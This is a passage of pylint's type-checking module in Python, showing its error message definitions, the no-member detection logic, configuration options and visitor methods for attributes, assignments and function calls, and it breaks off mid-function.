seq2_char), ) return row[seq2_length - 1] def _similar_names(owner, attrname, distance_threshold, max_choices): """Given an owner and a name, try to find similar names The similar names are searched given a distance metric and only a given number of choices will be returned. """ possible_names = [] names = _node_names(owner) for name in names: if name == attrname: continue distance = _string_distance(attrname, name) if distance <= distance_threshold: possible_names.append((name, distance)) # Now get back the values with a minimum, up to the given # limit or choices. 
picked = [ name for (name, _) in heapq.nsmallest( max_choices, possible_names, key=operator.itemgetter(1) ) ] return sorted(picked) def _missing_member_hint(owner, attrname, distance_threshold, max_choices): names = _similar_names(owner, attrname, distance_threshold, max_choices) if not names: # No similar name. return "" names = [repr(name) for name in names] if len(names) == 1: names = ", ".join(names) else: names = f"one of {', '.join(names[:-1])} or {names[-1]}" return f"; maybe {names}?" MSGS = { "E1101": ( "%s %r has no %r member%s", "no-member", "Used when a variable is accessed for an unexistent member.", {"old_names": [("E1103", "maybe-no-member")]}, ), "I1101": ( "%s %r has no %r member%s, but source is unavailable. Consider " "adding this module to extension-pkg-allow-list if you want " "to perform analysis based on run-time introspection of living objects.", "c-extension-no-member", "Used when a variable is accessed for non-existent member of C " "extension. Due to unavailability of source static analysis is impossible, " "but it may be performed by introspecting living objects in run-time.", ), "E1102": ( "%s is not callable", "not-callable", "Used when an object being called has been inferred to a non " "callable object.", ), "E1111": ( "Assigning result of a function call, where the function has no return", "assignment-from-no-return", "Used when an assignment is done on a function call but the " "inferred function doesn't return anything.", ), "E1120": ( "No value for argument %s in %s call", "no-value-for-parameter", "Used when a function call passes too few arguments.", ), "E1121": ( "Too many positional arguments for %s call", "too-many-function-args", "Used when a function call passes too many positional arguments.", ), "E1123": ( "Unexpected keyword argument %r in %s call", "unexpected-keyword-arg", "Used when a function call passes a keyword argument that " "doesn't correspond to one of the function's parameter names.", ), "E1124": ( "Argument 
%r passed by position and keyword in %s call", "redundant-keyword-arg", "Used when a function call would result in assigning multiple " "values to a function parameter, one value from a positional " "argument and one from a keyword argument.", ), "E1125": ( "Missing mandatory keyword argument %r in %s call", "missing-kwoa", ( "Used when a function call does not pass a mandatory" " keyword-only argument." ), ), "E1126": ( "Sequence index is not an int, slice, or instance with __index__", "invalid-sequence-index", "Used when a sequence type is indexed with an invalid type. " "Valid types are ints, slices, and objects with an __index__ " "method.", ), "E1127": ( "Slice index is not an int, None, or instance with __index__", "invalid-slice-index", "Used when a slice index is not an integer, None, or an object " "with an __index__ method.", ), "E1128": ( "Assigning result of a function call, where the function returns None", "assignment-from-none", "Used when an assignment is done on a function call but the " "inferred function returns nothing but None.", {"old_names": [("W1111", "old-assignment-from-none")]}, ), "E1129": ( "Context manager '%s' doesn't implement __enter__ and __exit__.", "not-context-manager", "Used when an instance in a with statement doesn't implement " "the context manager protocol(__enter__/__exit__).", ), "E1130": ( "%s", "invalid-unary-operand-type", "Emitted when a unary operand is used on an object which does not " "support this type of operation.", ), "E1131": ( "%s", "unsupported-binary-operation", "Emitted when a binary arithmetic operation between two " "operands is not supported.", ), "E1132": ( "Got multiple values for keyword argument %r in function call", "repeated-keyword", "Emitted when a function call got multiple values for a keyword.", ), "E1135": ( "Value '%s' doesn't support membership test", "unsupported-membership-test", "Emitted when an instance in membership test expression doesn't " "implement membership protocol 
(__contains__/__iter__/__getitem__).", ), "E1136": ( "Value '%s' is unsubscriptable", "unsubscriptable-object", "Emitted when a subscripted value doesn't support subscription " "(i.e. doesn't define __getitem__ method or __class_getitem__ for a class).", ), "E1137": ( "%r does not support item assignment", "unsupported-assignment-operation", "Emitted when an object does not support item assignment " "(i.e. doesn't define __setitem__ method).", ), "E1138": ( "%r does not support item deletion", "unsupported-delete-operation", "Emitted when an object does not support item deletion " "(i.e. doesn't define __delitem__ method).", ), "E1139": ( "Invalid metaclass %r used", "invalid-metaclass", "Emitted whenever we can detect that a class is using, " "as a metaclass, something which might be invalid for using as " "a metaclass.", ), "E1140": ( "Dict key is unhashable", "unhashable-dict-key", "Emitted when a dict key is not hashable " "(i.e. doesn't define __hash__ method).", ), "E1141": ( "Unpacking a dictionary in iteration without calling .items()", "dict-iter-missing-items", "Emitted when trying to iterate through a dict without calling .items()", ), "E1142": ( "'await' should be used within an async function", "await-outside-async", "Emitted when await is used outside an async function.", ), "W1113": ( "Keyword argument before variable positional arguments list " "in the definition of %s function", "keyword-arg-before-vararg", "When defining a keyword argument before variable positional arguments, one can " "end up in having multiple values passed for the aforementioned parameter in " "case the method is called with keyword arguments.", ), "W1114": ( "Positional arguments appear to be out of order", "arguments-out-of-order", "Emitted when the caller's argument names fully match the parameter " "names in the function signature but do not have the same order.", ), "W1115": ( "Non-string value assigned to __name__", "non-str-assignment-to-dunder-name", "Emitted when a 
non-string value is assigned to __name__", ), "W1116": ( "Second argument of isinstance is not a type", "isinstance-second-argument-not-valid-type", "Emitted when the second argument of an isinstance call is not a type.", ), } # builtin sequence types in Python 2 and 3. SEQUENCE_TYPES = { "str", "unicode", "list", "tuple", "bytearray", "xrange", "range", "bytes", "memoryview", } def _emit_no_member( node, owner, owner_name, mixin_class_rgx: Pattern[str], ignored_mixins=True, ignored_none=True, ): """Try to see if no-member should be emitted for the given owner. The following cases are ignored: * the owner is a function and it has decorators. * the owner is an instance and it has __getattr__, __getattribute__ implemented * the module is explicitly ignored from no-member checks * the owner is a class and the name can be found in its metaclass. * The access node is protected by an except handler, which handles AttributeError, Exception or bare except. * The node is guarded behind and `IF` or `IFExp` node """ # pylint: disable=too-many-return-statements if node_ignores_exception(node, AttributeError): return False if ignored_none and isinstance(owner, nodes.Const) and owner.value is None: return False if is_super(owner) or getattr(owner, "type", None) == "metaclass": return False if owner_name and ignored_mixins and mixin_class_rgx.match(owner_name): return False if isinstance(owner, nodes.FunctionDef) and ( owner.decorators or owner.is_abstract() ): return False if isinstance(owner, (astroid.Instance, nodes.ClassDef)): if owner.has_dynamic_getattr(): # Issue #2565: Don't ignore enums, as they have a `__getattr__` but it's not # invoked at this point. 
            try:
                metaclass = owner.metaclass()
            except astroid.MroError:
                return False
            if metaclass:
                # Renamed in Python 3.10 to `EnumType`
                return metaclass.qname() in {"enum.EnumMeta", "enum.EnumType"}
            return False
        if not has_known_bases(owner):
            return False

        # Exclude typed annotations, since these might actually exist
        # at some point during the runtime of the program.
        if utils.is_attribute_typed_annotation(owner, node.attrname):
            return False
    if isinstance(owner, astroid.objects.Super):
        # Verify if we are dealing with an invalid Super object.
        # If it is invalid, then there's no point in checking that
        # it has the required attribute. Also, don't fail if the
        # MRO is invalid.
        try:
            owner.super_mro()
        except (astroid.MroError, astroid.SuperError):
            return False
        if not all(has_known_bases(base) for base in owner.type.mro()):
            return False
    if isinstance(owner, nodes.Module):
        try:
            owner.getattr("__getattr__")
            return False
        except astroid.NotFoundError:
            pass
    if owner_name and node.attrname.startswith("_" + owner_name):
        # Test if an attribute has been mangled ('private' attribute):
        # a missing mangled name is only a real error when the unmangled
        # form does not exist on the owner either.
        unmangled_name = node.attrname.split("_" + owner_name)[-1]
        try:
            if owner.getattr(unmangled_name, context=None) is not None:
                return False
        except astroid.NotFoundError:
            return True
    if (
        owner.parent
        and isinstance(owner.parent, nodes.ClassDef)
        and owner.parent.name == "EnumMeta"
        and owner_name == "__members__"
        and node.attrname in {"items", "values", "keys"}
    ):
        # Avoid false positive on Enum.__members__.{items(), values, keys}
        # See https://github.com/PyCQA/pylint/issues/4123
        return False
    # Don't emit no-member if guarded behind `IF` or `IFExp`
    #   * Walk up recursively until if statement is found.
    #   * Check if condition can be inferred as `Const`,
    #     would evaluate as `False`,
    #     and whether the node is part of the `body`.
    #   * Continue checking until scope of node is reached.
    scope: nodes.NodeNG = node.scope()
    node_origin: nodes.NodeNG = node
    parent: nodes.NodeNG = node.parent
    while parent != scope:
        if isinstance(parent, (nodes.If, nodes.IfExp)):
            inferred = safe_infer(parent.test)
            if (  # pylint: disable=too-many-boolean-expressions
                isinstance(inferred, nodes.Const)
                and inferred.bool_value() is False
                and (
                    isinstance(parent, nodes.If)
                    and node_origin in parent.body
                    or isinstance(parent, nodes.IfExp)
                    and node_origin == parent.body
                )
            ):
                return False
        node_origin, parent = parent, parent.parent
    return True


def _determine_callable(
    callable_obj: nodes.NodeNG,
) -> Tuple[CallableObjects, int, str]:
    """Resolve *callable_obj* to the function-like object that would actually
    run, along with its implicit parameter count and a human-readable
    description of its kind (used in emitted messages)."""
    # pylint: disable=fixme
    # TODO: The typing of the second return variable is actually Literal[0,1]
    # We need typing on astroid.NodeNG.implicit_parameters for this
    # TODO: The typing of the third return variable can be narrowed to a Literal
    # We need typing on astroid.NodeNG.type for this

    # Ordering is important, since BoundMethod is a subclass of UnboundMethod,
    # and Function inherits Lambda.
    parameters = 0
    if hasattr(callable_obj, "implicit_parameters"):
        parameters = callable_obj.implicit_parameters()
    if isinstance(callable_obj, bases.BoundMethod):
        # Bound methods have an extra implicit 'self' argument.
        return callable_obj, parameters, callable_obj.type
    if isinstance(callable_obj, bases.UnboundMethod):
        return callable_obj, parameters, "unbound method"
    if isinstance(callable_obj, nodes.FunctionDef):
        return callable_obj, parameters, callable_obj.type
    if isinstance(callable_obj, nodes.Lambda):
        return callable_obj, parameters, "lambda"
    if isinstance(callable_obj, nodes.ClassDef):
        # Class instantiation, lookup __new__ instead.
        # If we only find object.__new__, we can safely check __init__
        # instead. If __new__ belongs to builtins, then we look
        # again for __init__ in the locals, since we won't have
        # argument information for the builtin __new__ function.
        try:
            # Use the last definition of __new__.
            new = callable_obj.local_attr("__new__")[-1]
        except astroid.NotFoundError:
            new = None
        from_object = new and new.parent.scope().name == "object"
        from_builtins = new and new.root().name in sys.builtin_module_names
        if not new or from_object or from_builtins:
            try:
                # Use the last definition of __init__.
                callable_obj = callable_obj.local_attr("__init__")[-1]
            except astroid.NotFoundError as e:
                # do nothing, covered by no-init.
                raise ValueError from e
        else:
            callable_obj = new

        if not isinstance(callable_obj, nodes.FunctionDef):
            raise ValueError
        # both have an extra implicit 'cls'/'self' argument.
        return callable_obj, parameters, "constructor"
    raise ValueError


def _has_parent_of_type(node, node_type, statement):
    """Check if the given node has a parent of the given type."""
    parent = node.parent
    while not isinstance(parent, node_type) and statement.parent_of(parent):
        parent = parent.parent
    return isinstance(parent, node_type)


def _no_context_variadic_keywords(node, scope):
    """Return True if *node* forwards a **kwargs variadic with no call context."""
    statement = node.statement(future=True)
    variadics = ()

    if isinstance(scope, nodes.Lambda) and not isinstance(scope, nodes.FunctionDef):
        variadics = list(node.keywords or []) + node.kwargs
    elif isinstance(statement, (nodes.Return, nodes.Expr, nodes.Assign)) and isinstance(
        statement.value, nodes.Call
    ):
        call = statement.value
        variadics = list(call.keywords or []) + call.kwargs

    return _no_context_variadic(node, scope.args.kwarg, nodes.Keyword, variadics)


def _no_context_variadic_positional(node, scope):
    """Return True if *node* forwards a *args variadic with no call context."""
    variadics = node.starargs + node.kwargs
    return _no_context_variadic(node, scope.args.vararg, nodes.Starred, variadics)


def _no_context_variadic(node, variadic_name, variadic_type, variadics):
    """Verify if the given call node has variadic nodes without context

    This is a workaround for handling cases of nested call functions
    which don't have the specific call context at hand.
    Variadic arguments (variable positional arguments and variable
    keyword arguments) are inferred, inherently wrong, by astroid
    as a Tuple, respectively a Dict with empty elements.
    This can lead pylint to believe that a function call receives
    too few arguments.
    """
    scope = node.scope()
    is_in_lambda_scope = not isinstance(scope, nodes.FunctionDef) and isinstance(
        scope, nodes.Lambda
    )
    statement = node.statement(future=True)
    for name in statement.nodes_of_class(nodes.Name):
        if name.name != variadic_name:
            continue

        inferred = safe_infer(name)
        if isinstance(inferred, (nodes.List, nodes.Tuple)):
            length = len(inferred.elts)
        elif isinstance(inferred, nodes.Dict):
            length = len(inferred.items)
        else:
            continue

        if is_in_lambda_scope and isinstance(inferred.parent, nodes.Arguments):
            # The statement of the variadic will be the assignment itself,
            # so we need to go the lambda instead
            inferred_statement = inferred.parent.parent
        else:
            inferred_statement = inferred.statement(future=True)

        if not length and isinstance(inferred_statement, nodes.Lambda):
            is_in_starred_context = _has_parent_of_type(node, variadic_type, statement)
            used_as_starred_argument = any(
                variadic.value == name or variadic.value.parent_of(name)
                for variadic in variadics
            )
            if is_in_starred_context or used_as_starred_argument:
                return True
    return False


def _is_invalid_metaclass(metaclass):
    """Return True when *metaclass* cannot act as a metaclass (its MRO does
    not include the builtin ``type``)."""
    try:
        mro = metaclass.mro()
    except NotImplementedError:
        # Cannot have a metaclass which is not a newstyle class.
        return True
    else:
        if not any(is_builtin_object(cls) and cls.name == "type" for cls in mro):
            return True
    return False


def _infer_from_metaclass_constructor(cls, func: nodes.FunctionDef):
    """Try to infer what the given *func* constructor is building

    :param astroid.FunctionDef func:
        A metaclass constructor. Metaclass definitions can be
        functions, which should accept three arguments, the name of
        the class, the bases of the class and the attributes.
        The function could return anything, but usually it should
        be a proper metaclass.
    :param astroid.ClassDef cls:
        The class for which the *func* parameter should generate
        a metaclass.
    :returns:
        The class generated by the function or None,
        if we couldn't infer it.
    :rtype: astroid.ClassDef
    """
    # Build a synthetic call context (name, bases, attrs) and ask astroid
    # what the constructor would return for it.
    context = astroid.context.InferenceContext()
    class_bases = nodes.List()
    class_bases.postinit(elts=cls.bases)

    attrs = nodes.Dict()
    local_names = [(name, values[-1]) for name, values in cls.locals.items()]
    attrs.postinit(local_names)

    builder_args = nodes.Tuple()
    builder_args.postinit([cls.name, class_bases, attrs])

    context.callcontext = astroid.context.CallContext(builder_args)
    try:
        inferred = next(func.infer_call_result(func, context), None)
    except astroid.InferenceError:
        return None
    return inferred or None


def _is_c_extension(module_node):
    # A module that is not in the standard library and whose members could
    # not all be statically resolved is treated as a C extension.
    return (
        not astroid.modutils.is_standard_module(module_node.name)
        and not module_node.fully_defined()
    )


def _is_invalid_isinstance_type(arg):
    # Return True if we are sure that arg is not a type
    inferred = utils.safe_infer(arg)
    if not inferred:
        # Cannot infer it so skip it.
        return False
    if isinstance(inferred, nodes.Tuple):
        return any(_is_invalid_isinstance_type(elt) for elt in inferred.elts)
    if isinstance(inferred, nodes.ClassDef):
        return False
    if isinstance(inferred, astroid.Instance) and inferred.qname() == BUILTIN_TUPLE:
        return False
    return True


class TypeChecker(BaseChecker):
    """try to find bugs in the code using type inference"""

    __implements__ = (IAstroidChecker,)

    # configuration section name
    name = "typecheck"
    # messages
    msgs = MSGS
    priority = -1
    # configuration options, consumed by the BaseChecker config machinery
    # and exposed as self.config.<option_with_underscores>
    options = (
        (
            "ignore-on-opaque-inference",
            {
                "default": True,
                "type": "yn",
                "metavar": "<y or n>",
                "help": "This flag controls whether pylint should warn about "
                "no-member and similar checks whenever an opaque object "
                "is returned when inferring. The inference can return "
                "multiple potential results while evaluating a Python object, "
                "but some branches might not be evaluated, which results in "
                "partial inference. In that case, it might be useful to still emit "
                "no-member and other checks for the rest of the inferred objects.",
            },
        ),
        (
            "mixin-class-rgx",
            {
                "default": ".*[Mm]ixin",
                "type": "regexp",
                "metavar": "<regexp>",
                "help": "Regex pattern to define which classes are considered mixins "
                "ignore-mixin-members is set to 'yes'",
            },
        ),
        (
            "ignore-mixin-members",
            {
                "default": True,
                "type": "yn",
                "metavar": "<y or n>",
                "help": "Tells whether missing members accessed in mixin "
                "class should be ignored. A class is considered mixin if its name matches "
                "the mixin-class-rgx option.",
            },
        ),
        (
            "ignore-none",
            {
                "default": True,
                "type": "yn",
                "metavar": "<y or n>",
                "help": "Tells whether to warn about missing members when the owner "
                "of the attribute is inferred to be None.",
            },
        ),
        (
            "ignored-modules",
            {
                "default": (),
                "type": "csv",
                "metavar": "<module names>",
                "help": "List of module names for which member attributes "
                "should not be checked (useful for modules/projects "
                "where namespaces are manipulated during runtime and "
                "thus existing member attributes cannot be "
                "deduced by static analysis). It supports qualified "
                "module names, as well as Unix pattern matching.",
            },
        ),
        # the defaults here are *stdlib* names that (almost) always
        # lead to false positives, since their idiomatic use is
        # 'too dynamic' for pylint to grok.
        (
            "ignored-classes",
            {
                "default": ("optparse.Values", "thread._local", "_thread._local"),
                "type": "csv",
                "metavar": "<members names>",
                "help": "List of class names for which member attributes "
                "should not be checked (useful for classes with "
                "dynamically set attributes). This supports "
                "the use of qualified names.",
            },
        ),
        (
            "generated-members",
            {
                "default": (),
                "type": "string",
                "metavar": "<members names>",
                "help": "List of members which are set dynamically and \
missed by pylint inference system, and so shouldn't trigger E1101 when \
accessed. Python regular expressions are accepted.",
            },
        ),
        (
            "contextmanager-decorators",
            {
                "default": ["contextlib.contextmanager"],
                "type": "csv",
                "metavar": "<decorator names>",
                "help": "List of decorators that produce context managers, "
                "such as contextlib.contextmanager. Add to this list "
                "to register other decorators that produce valid "
                "context managers.",
            },
        ),
        (
            "missing-member-hint-distance",
            {
                "default": 1,
                "type": "int",
                "metavar": "<member hint edit distance>",
                "help": "The minimum edit distance a name should have in order "
                "to be considered a similar match for a missing member name.",
            },
        ),
        (
            "missing-member-max-choices",
            {
                "default": 1,
                "type": "int",
                "metavar": "<member hint max choices>",
                "help": "The total number of similar names that should be taken in "
                "consideration when showing a hint for a missing member.",
            },
        ),
        (
            "missing-member-hint",
            {
                "default": True,
                "type": "yn",
                "metavar": "<missing member hint>",
                "help": "Show a hint with possible names when a member name was not "
                "found. The aspect of finding the hint is based on edit distance.",
            },
        ),
        (
            "signature-mutators",
            {
                "default": [],
                "type": "csv",
                "metavar": "<decorator names>",
                "help": "List of decorators that change the signature of "
                "a decorated function.",
            },
        ),
    )

    def open(self) -> None:
        """Cache per-run state derived from global options."""
        py_version = get_global_option(self, "py-version")
        self._py310_plus = py_version >= (3, 10)
        self._mixin_class_rgx = get_global_option(self, "mixin-class-rgx")

    @astroid.decorators.cachedproperty
    def _suggestion_mode(self):
        return get_global_option(self, "suggestion-mode", default=True)

    @astroid.decorators.cachedproperty
    def _compiled_generated_members(self) -> Tuple[Pattern, ...]:
        # do this lazily since config not fully initialized in __init__
        # generated_members may contain regular expressions
        # (surrounded by quote `"` and followed by a comma `,`)
        # REQUEST,aq_parent,"[a-zA-Z]+_set{1,2}"' =>
        # ('REQUEST', 'aq_parent', '[a-zA-Z]+_set{1,2}')
        generated_members = self.config.generated_members
        if isinstance(generated_members, str):
            gen = shlex.shlex(generated_members)
            gen.whitespace += ","
            gen.wordchars += r"[]-+\.*?()|"
            generated_members = tuple(tok.strip('"') for tok in gen)
        return tuple(re.compile(exp) for exp in generated_members)

    @check_messages("keyword-arg-before-vararg")
    def visit_functiondef(self, node: nodes.FunctionDef) -> None:
        # check for keyword arg before varargs
        # NOTE(review): args=(node.name) is a bare string, not a 1-tuple —
        # presumably add_message accepts a single value here; confirm.
        if node.args.vararg and node.args.defaults:
            self.add_message("keyword-arg-before-vararg", node=node, args=(node.name))

    visit_asyncfunctiondef = visit_functiondef

    @check_messages("invalid-metaclass")
    def visit_classdef(self, node: nodes.ClassDef) -> None:
        def _metaclass_name(metaclass):
            # pylint: disable=unidiomatic-typecheck
            if isinstance(metaclass, (nodes.ClassDef, nodes.FunctionDef)):
                return metaclass.name
            if type(metaclass) is bases.Instance:
                # Really do mean type, not isinstance, since subclasses of bases.Instance
                # like Const or Dict should use metaclass.as_string below.
                return str(metaclass)
            return metaclass.as_string()

        metaclass = node.declared_metaclass()
        if not metaclass:
            return

        if isinstance(metaclass, nodes.FunctionDef):
            # Try to infer the result.
            metaclass = _infer_from_metaclass_constructor(node, metaclass)
            if not metaclass:
                # Don't do anything if we cannot infer the result.
                return

        if isinstance(metaclass, nodes.ClassDef):
            if _is_invalid_metaclass(metaclass):
                self.add_message(
                    "invalid-metaclass", node=node, args=(_metaclass_name(metaclass),)
                )
        else:
            # A declared metaclass that is not a class at all is always invalid.
            self.add_message(
                "invalid-metaclass", node=node, args=(_metaclass_name(metaclass),)
            )

    def visit_assignattr(self, node: nodes.AssignAttr) -> None:
        # An augmented assignment (x.attr += v) also *reads* the attribute,
        # so run the member-access check on it.
        if isinstance(node.assign_type(), nodes.AugAssign):
            self.visit_attribute(node)

    def visit_delattr(self, node: nodes.DelAttr) -> None:
        self.visit_attribute(node)

    @check_messages("no-member", "c-extension-no-member")
    def visit_attribute(self, node: nodes.Attribute) -> None:
        """check that the accessed attribute exists

        to avoid too much false positives for now, we'll consider the code as
        correct if a single of the inferred nodes has the accessed attribute.

        function/method, super call and metaclasses are ignored
        """
        # Skip anything that matches the user-configured generated-members
        # patterns (both the bare attribute name and the full expression).
        if any(
            pattern.match(name)
            for name in (node.attrname, node.as_string())
            for pattern in self._compiled_generated_members
        ):
            return

        try:
            inferred = list(node.expr.infer())
        except astroid.InferenceError:
            return

        # list of (node, nodename) which are missing the attribute
        missingattr = set()

        non_opaque_inference_results = [
            owner
            for owner in inferred
            if owner is not astroid.Uninferable and not isinstance(owner, nodes.Unknown)
        ]
        if (
            len(non_opaque_inference_results) != len(inferred)
            and self.config.ignore_on_opaque_inference
        ):
            # There is an ambiguity in the inference. Since we can't
            # make sure that we won't emit a false positive, we just stop
            # whenever the inference returns an opaque inference object.
            return
        for owner in non_opaque_inference_results:
            name = getattr(owner, "name", None)
            if _is_owner_ignored(
                owner, name, self.config.ignored_classes, self.config.ignored_modules
            ):
                continue

            qualname = f"{owner.pytype()}.{node.attrname}"
            if any(
                pattern.match(qualname) for pattern in self._compiled_generated_members
            ):
                return

            try:
                if not [
                    n
                    for n in owner.getattr(node.attrname)
                    if not isinstance(n.statement(future=True), nodes.AugAssign)
                ]:
                    missingattr.add((owner, name))
                    continue
            except astroid.exceptions.StatementMissing:
                continue
            except AttributeError:
                continue
            except astroid.DuplicateBasesError:
                continue
            except astroid.NotFoundError:
                # This can't be moved before the actual .getattr call,
                # because there can be more values inferred and we are
                # stopping after the first one which has the attribute in question.
                # The problem is that if the first one has the attribute,
                # but we continue to the next values which doesn't have the
                # attribute, then we'll have a false positive.
                # So call this only after the call has been made.
                if not _emit_no_member(
                    node,
                    owner,
                    name,
                    self._mixin_class_rgx,
                    ignored_mixins=self.config.ignore_mixin_members,
                    ignored_none=self.config.ignore_none,
                ):
                    continue
                missingattr.add((owner, name))
                continue
            # stop on the first found
            break
        else:
            # we have not found any node with the attributes, display the
            # message for inferred nodes
            done = set()
            for owner, name in missingattr:
                if isinstance(owner, astroid.Instance):
                    actual = owner._proxied
                else:
                    actual = owner
                if actual in done:
                    continue
                done.add(actual)

                msg, hint = self._get_nomember_msgid_hint(node, owner)
                self.add_message(
                    msg,
                    node=node,
                    args=(owner.display_type(), name, node.attrname, hint),
                    confidence=INFERENCE,
                )

    def _get_nomember_msgid_hint(self, node, owner):
        """Return the (message-id, hint) pair to emit for a missing member:
        c-extension-no-member for opaque C extension modules, otherwise
        no-member with an optional did-you-mean hint."""
        suggestions_are_possible = self._suggestion_mode and isinstance(
            owner, nodes.Module
        )
        if suggestions_are_possible and _is_c_extension(owner):
            msg = "c-extension-no-member"
            hint = ""
        else:
            msg = "no-member"
            if self.config.missing_member_hint:
                hint = _missing_member_hint(
                    owner,
                    node.attrname,
                    self.config.missing_member_hint_distance,
                    self.config.missing_member_max_choices,
                )
            else:
                hint = ""
        return msg, hint

    @check_messages(
        "assignment-from-no-return",
        "assignment-from-none",
        "non-str-assignment-to-dunder-name",
    )
    def visit_assign(self, node: nodes.Assign) -> None:
        """Process assignments in the AST."""
        self._check_assignment_from_function_call(node)
        self._check_dundername_is_string(node)

    def _check_assignment_from_function_call(self, node):
        """check that if assigning to a function call, the function is
        possibly returning something valuable
        """
        if not isinstance(node.value, nodes.Call):
            return

        function_node = safe_infer(node.value.func)
        funcs = (nodes.FunctionDef, astroid.UnboundMethod, astroid.BoundMethod)
        if not isinstance(function_node, funcs):
            return

        # Unwrap to get the actual function object
        if isinstance(function_node, astroid.BoundMethod) and isinstance(
            function_node._proxied, astroid.UnboundMethod
        ):
            function_node = function_node._proxied._proxied

        # Make sure that it's a valid function that we can analyze.
        # Ordered from less expensive to more expensive checks.
        # pylint: disable=too-many-boolean-expressions
        if (
            not function_node.is_function
            or isinstance(function_node, nodes.AsyncFunctionDef)
            or function_node.decorators
            or function_node.is_generator()
            or function_node.is_abstract(pass_is_abstract=False)
            or utils.is_error(function_node)
            or not function_node.root().fully_defined()
        ):
            return

        returns = list(
            function_node.nodes_of_class(nodes.Return, skip_klass=nodes.FunctionDef)
        )
        if not returns:
            self.add_message("assignment-from-no-return", node=node)
        else:
            # assignment-from-none only applies when *every* return is None.
            for rnode in returns:
                if not (
                    isinstance(rnode.value, nodes.Const)
                    and rnode.value.value is None
                    or rnode.value is None
                ):
                    break
            else:
                self.add_message("assignment-from-none", node=node)

    def _check_dundername_is_string(self, node):
        """Check a string is assigned to self.__name__"""

        # Check the left-hand side of the assignment is <something>.__name__
        lhs = node.targets[0]
        if not isinstance(lhs, nodes.AssignAttr):
            return
        if not lhs.attrname == "__name__":
            return

        # If the right-hand side is not a string
        rhs = node.value
        if isinstance(rhs, nodes.Const) and isinstance(rhs.value, str):
            return
        inferred = utils.safe_infer(rhs)
        if not inferred:
            return
        if not (isinstance(inferred, nodes.Const) and isinstance(inferred.value, str)):
            # Add the message
            self.add_message("non-str-assignment-to-dunder-name", node=node)

    def _check_uninferable_call(self, node):
        """Check that the given uninferable Call node does not
        call an actual function.
        """
        if not isinstance(node.func, nodes.Attribute):
            return

        # Look for properties. First, obtain
        # the lhs of the Attribute node and search the attribute
        # there. If that attribute is a property or a subclass of properties,
        # then most likely it's not callable.

        expr = node.func.expr
        klass = safe_infer(expr)
        if (
            klass is None
            or klass is astroid.Uninferable
            or not isinstance(klass, astroid.Instance)
        ):
            return

        try:
            attrs = klass._proxied.getattr(node.func.attrname)
        except astroid.NotFoundError:
            return

        for attr in attrs:
            if attr is astroid.Uninferable:
                continue
            if not isinstance(attr, nodes.FunctionDef):
                continue

            # Decorated, see if it is decorated with a property.
            # Also, check the returns and see if they are callable.
            if decorated_with_property(attr):

                try:
                    all_returns_are_callable = all(
                        return_node.callable() or return_node is astroid.Uninferable
                        for return_node in attr.infer_call_result(node)
                    )
                except astroid.InferenceError:
                    continue

                if not all_returns_are_callable:
                    self.add_message(
                        "not-callable", node=node, args=node.func.as_string()
                    )
                    break

    def _check_argument_order(self, node, call_site, called, called_param_names):
        """Match the supplied argument names against the function parameters.

        Warn if some argument names are not in the same order as they are in
        the function signature.
        """
        # Check for called function being an object instance function
        # If so, ignore the initial 'self' argument in the signature
        try:
            is_classdef = isinstance(called.parent, nodes.ClassDef)
            if is_classdef and called_param_names[0] == "self":
                called_param_names = called_param_names[1:]
        except IndexError:
            return

        try:
            # extract argument names, if they have names
            calling_parg_names = [p.name for p in call_site.positional_arguments]

            # Additionally, get names of keyword arguments to use in a full match
            # against parameters
            calling_kwarg_names = [
                arg.name for arg in call_site.keyword_arguments.values()
            ]
        except AttributeError:
            # the type of arg does not provide a `.name`. In this case we
            # stop checking for out-of-order arguments because it is only relevant
            # for named variables.
            return

        # Don't check for ordering if there is an unmatched arg or param
        arg_set = set(calling_parg_names) | set(calling_kwarg_names)
        param_set = set(called_param_names)
        if arg_set != param_set:
            return

        # Warn based on the equality of argument ordering
        if calling_parg_names != called_param_names[: len(calling_parg_names)]:
            self.add_message("arguments-out-of-order", node=node, args=())

    def _check_isinstance_args(self, node):
        """Emit a message when the second argument of an isinstance call is
        provably not a type (or tuple of types)."""
        if len(node.args) != 2:
            # isinstance called with wrong number of args
            return

        second_arg = node.args[1]
        if _is_invalid_isinstance_type(second_arg):
            self.add_message("isinstance-second-argument-not-valid-type", node=node)

    # pylint: disable=too-many-branches,too-many-locals
    @check_messages(*(list(MSGS.keys())))
    def visit_call(self, node: nodes.Call) -> None:
        """check that called functions/methods are inferred to callable objects,
        and that the arguments passed to the function match the parameters in
        the inferred function's definition
        """
        called = safe_infer(node.func)

        self._check_not_callable(node, called)
        try:
            called, implicit_args, callable_name = _determine_callable(called)
        except ValueError:
            # Any error occurred during determining the function type, most of
            # those errors are handled by different warnings.
            return

        if called.args.args is None:
            if called.name == "isinstance":
                # Verify whether second argument of isinstance is a valid type
                self._check_isinstance_args(node)
            # Built-in functions have no argument information.
            return

        if len(called.argnames()) != len(set(called.argnames())):
            # Duplicate parameter name (see duplicate-argument). We can't really
            # make sense of the function call in this case, so just return.
            return

        # Build the set of keyword arguments, checking for duplicate keywords,
        # and count the positional arguments.
        call_site = astroid.arguments.CallSite.from_call(node)

        # Warn about duplicated keyword arguments, such as `f=24, **{'f': 24}`
        for keyword in call_site.duplicated_keywords:
            self.add_message("repeated-keyword", node=node, args=(keyword,))

        if call_site.has_invalid_arguments() or call_site.has_invalid_keywords():
            # Can't make sense of this.
            return

        # Has the function signature changed in ways we cannot reliably detect?
        if hasattr(called, "decorators") and decorated_with(
            called, self.config.signature_mutators
        ):
            return

        num_positional_args = len(call_site.positional_arguments)
        keyword_args = list(call_site.keyword_arguments.keys())
        overload_function = is_overload_stub(called)

        # Determine if we don't have a context for our call and we use variadics.
        node_scope = node.scope()
        if isinstance(node_scope, (nodes.Lambda, nodes.FunctionDef)):
            has_no_context_positional_variadic = _no_context_variadic_positional(
                node, node_scope
            )
            has_no_context_keywords_variadic = _no_context_variadic_keywords(
                node, node_scope
            )
        else:
            has_no_context_positional_variadic = (
                has_no_context_keywords_variadic
            ) = False

        # These are coming from the functools.partial implementation in astroid
        already_filled_positionals = getattr(called, "filled_positionals", 0)
        already_filled_keywords = getattr(called, "filled_keywords", {})

        keyword_args += list(already_filled_keywords)
        num_positional_args += implicit_args + already_filled_positionals

        # Analyze the list of formal parameters.
        # Each entry of `parameters` is [(name, default), assigned_flag].
        args = list(itertools.chain(called.args.posonlyargs or (), called.args.args))
        num_mandatory_parameters = len(args) - len(called.args.defaults)
        parameters: List[List[Any]] = []
        parameter_name_to_index = {}
        for i, arg in enumerate(args):
            if isinstance(arg, nodes.Tuple):
                name = None
